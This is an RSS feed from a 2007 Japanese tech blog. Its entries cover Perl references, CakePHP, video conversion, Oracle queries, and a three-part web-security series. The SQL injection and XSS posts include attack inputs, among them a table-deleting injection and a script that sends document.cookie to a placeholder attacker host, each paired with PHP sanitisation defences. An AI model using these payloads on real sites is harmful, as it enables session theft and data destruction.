Tech * Note http://2mihi.com 面白いWebサービスやWeb技術、デザイン、EC、SEO、その他ビジネス関連について紹介していきます Sat, 15 Sep 2007 17:09:31 +0900 http://wordpress.xwd.jp/?v=ME2.0.9 ja CSSで使用するフォント http://2mihi.com/49 http://2mihi.com/49#comments Sun, 16 Sep 2007 02:09:31 +0900 tenma 未分類 http://2mihi.com/49 http://2mihi.com/49/feed/ CakePHPを使ってみる#1 http://2mihi.com/48 http://2mihi.com/48#comments Fri, 17 Aug 2007 00:56:22 +0900 tenma PHP CakePHP http://2mihi.com/48 【ダウンロード】 以下サイトからダウンロードする。 http://www.cakephp.org/]]> http://2mihi.com/48/feed/ Perlのリファレンスを使用する方法 http://2mihi.com/47 http://2mihi.com/47#comments Sun, 20 May 2007 23:24:18 +0900 tenma Perl http://2mihi.com/47
  • まずは各々の変数を定義
    • $scalar = "scalar";
@array = ('array0','array1');
%hash = (key1=>'value1', key2=>'value2');
    • 上記の変数のリファレンスをスカラ変数に設定する
    $scalarref=¥$scalar;
$arrayref=¥@array;
$hashref=¥%hash;
    • リファレンスを元の型に戻す
    $scalar_org=$$scalarref;
@array_org=@$arrayref;
%hash_org=%$hashref;
    • 無名配列と無名ハッシュの設定方法
    $arrayref = ['array0', 'array1'];
$hashref = {key1=>'value1', key2=>'value2'};
    • デリファレンス演算子を使用して値を取り出す
    $arrayref->[0]; #array0
$hashref->{key2}; #value2
    • ちょっと複雑なデータ構造
    @array=(['item0','item1','item2'],
['item3','item4','item5']);

@{array[1]}; #@$arrayref : ['item3','item4','item5']
${array[1]}[2]; #item5
$array[1]->[2]; #item5
$array[1][2]; #item5
    • 配列とハッシュのスライス
    @array=('item0','item1','item2');
#変数は配列のまま要素を指定 ('item1','item2')
@array_slice=@array[1,2];
%hash=(key1=>'val1',key2>'val2',key3=>'val3');
@array_slice=@hash{key1,key3}; #('val1','val3')
@keys = qw(key1 key3);
@array_slice=@hash{@keys};  #('val1','val3')
    ]]>     http://2mihi.com/47/feed/     Perlの勉強はじめました。(perldoc等) http://2mihi.com/45 http://2mihi.com/45#comments Tue, 01 May 2007 01:00:25 +0900 tenma Perl http://2mihi.com/45
  • Perlのバージョンを確認する
    • > perl -v
    • 組み込み関数一覧を表示する
    > perldoc perlfunc
    • ドキュメントの確認方法
    > perldoc -f shift
    • 文法のチェック
    > perl -cw test.pl
    • 冒頭に必ずつける
    use strict; #厳密なプログラムチェック
use warnings; #詳細な警告
    ]]>     http://2mihi.com/45/feed/     mpegファイルをflvファイルに変換する http://2mihi.com/44 http://2mihi.com/44#comments Mon, 23 Apr 2007 01:35:55 +0900 tenma 便利ツール http://2mihi.com/44 1. まずはファイルフォーマットを調査します 真空波動研SuperLite ドラッグすればファイルのフォーマットmpeg1ということがわかります。 2. 次にmpegファイルを変換します Mpgcutter MPEG1/2ファイルでCM削除など、切り張り編集が可能なMPEG編集ソフト ※動画ファイルを同一フォルダにいれないとなぜか変換できませんでした。 3. mpeg⇒flv変換 Riva FLV Encoder http://www.download.com/Riva-FLV-Encoder/3000-2140-10320097.html?part=dl-RivaFLVEn&subj=dl&tag=button
    真空波動研SuperLiteMpgcutter Riva FLV Encoder http://www.download.com/Riva-FLV-Encoder/3000-2140-10320097.html?part=dl-RivaFLVEn&subj=dl&tag=button
    ]]>     http://2mihi.com/44/feed/     HTTPの勉強方法 http://2mihi.com/43 http://2mihi.com/43#comments Tue, 17 Apr 2007 01:09:34 +0900 tenma HTTP http://2mihi.com/43 > telnet MicrosoftTelnet> open localhost 80 接続中: localhost... GET / HTTP/1.1 Host: localhost]]> http://2mihi.com/43/feed/ Webセキュリティ(3)-SQL Injection http://2mihi.com/41 http://2mihi.com/41#comments Sun, 15 Apr 2007 03:15:02 +0900 tenma DB セキュリティ PHP http://2mihi.com/41 SQL Injection。 これは、Script InsertionXSSと違ってJavaScriptは必要ありません。 【概要】 削除フォーム等でSQLが必ず、真になるように入力し本来考慮していない動作をさせる 【攻撃】 フォームからのSQL、where句を必ず真にするようにして悪意のあるSQLに変換する 
    例1(SQL):
0 or 1 /*(コメントアウト文)

例2(SQL):
0 or 1; delete from table /*
    【防御】 SQLサニタイズを実施する(整数値:intval、文字列:addslashes、浮動小数点:doubleval) 
    例(PHP):
"SELECT COUNT(*) FROM bbs
WHERE id='".intval($_POST["id"]).
"' AND pass<>'".addslashes($_POST["pass"])."'"
    直接関係ないですが、チェックをereg等の関数でおこなうのは危険です。 eregはバイナリセーフでないため、ヌルバイト文字(\0)を入れられると フィルタリングは意味を持たなくなります]]>     http://2mihi.com/41/feed/     Webセキュリティ(2)-XSS(クロスサイトスクリプティング) http://2mihi.com/40 http://2mihi.com/40#comments Sun, 15 Apr 2007 01:32:01 +0900 tenma セキュリティ PHP http://2mihi.com/40 XSS(クロスサイトスクリプティング)です。 おそらく一番有名なアタック方法ではないでしょうか? 【概要】 特定のURIを送り込んで(JavaScript)、強制的にスクリプトを実行させる。 HTTPにJavaScriptがのるのが特徴 【攻撃】 以下のJavaScriptを掲示板等の入力フォームに書きこむか、 もしくは、同様のものをメールで送信し、踏ませる 
    例(JavaScript):
1)http://target/index.php?id=
<script>document.localtion='http://akui/?'+document.cookie;
</script>
2)タグなしパターン
http://target/indexphp/"
onmouseover="document.location='http:akui/?'+document.cookie;/
    【防御】 HTMLサニタイズ(無害化)する 
    例(PHP):
1)echo htmlspecialchars($row['name'],ENT_QUOTES);
2)IEのバグでjavascriptの間に制御文字が入ってもスクリプトの開始と
みなすため、ブラックリスト法では対処が不十分
preg_replace('/javascript/i', '',
preg_replace('/[x00-x20x22x27]/', '', $url));
    ]]>     http://2mihi.com/40/feed/     Webセキュリティ(1)-Script Insertion http://2mihi.com/39 http://2mihi.com/39#comments Sun, 15 Apr 2007 00:59:14 +0900 tenma セキュリティ PHP http://2mihi.com/39 Script Insertionです。 【概要】 いわゆるフォームにJavaScriptを埋め込んで、リダイレクトやCookie情報をとる 【攻撃】 以下のJavaScriptを掲示板等の入力フォームに書きこむ 
    例(JavaScript):
localtion.href="http://xxx" mce_href="http://xxx"         ;
    【防御】 HTMLサニタイズ(無害化)する 
    例(PHP):
echo htmlspecialchars($row['name'],ENT_QUOTES);
    ]]>     http://2mihi.com/39/feed/     よく忘れるOracleの件数指定でのselect http://2mihi.com/38 http://2mihi.com/38#comments Wed, 11 Apr 2007 19:24:02 +0900 tenma DB http://2mihi.com/38 -- sample_tableから頭10件のみ取得 select * from sample_table where rownum <= 10]]> http://2mihi.com/38/feed/